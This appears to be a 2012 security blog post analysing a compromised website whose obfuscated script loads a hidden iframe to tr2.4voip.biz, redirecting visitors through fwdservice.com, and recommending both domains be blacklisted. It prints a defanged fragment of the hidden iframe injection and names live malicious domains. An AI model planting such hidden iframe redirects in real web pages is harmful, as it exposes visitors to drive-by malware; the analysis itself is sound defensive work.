Suspicious Movement in ASN40034 (infector to tr2.4voip.biz & fwdservice.com)
01 Sep 2012
It's beginning from infected hosting homepage of hxxp://dansenbijjansen.com/
It is a good honest site. Sadly, it's having the suspicious code at
I downloaded to examine to find the below JS/Code:
↑was easily to deobfuscate to find the below iframer...
＜iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style=
Which making me checking the hxxp://tr2.4voip.biz/in.cgi?2 to find-
the multiple malicious links as per coded below:
↑The above links is obviously for the purpose to make sure users are -
redirected to the below HTML file with another JS code:
It will lead us to the link of:
What's this? We have many reference about it in the urlquery below:
This is actually a url forwarder service used to redirect request to some-
other URL for the downloading or etc purpose. I checked to the recorded URL-
And found the format of the query like:
hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio= \ Or....
In our case with the certain ticket (folio=7POYGN0G2) and -
domain (dmn=dmn=4voip.biz) forwarded us to special path in 4voip.biz host.
Be free to check and analyzed further of what you can get from that host.
The interesting part is tr2.4voip.biz and fwdservice.com are in the -
same network :
With sharing same IP address with lame malicious domain like:
Blacklisting 4voip.biz and fwdservice.com will be a nice idea!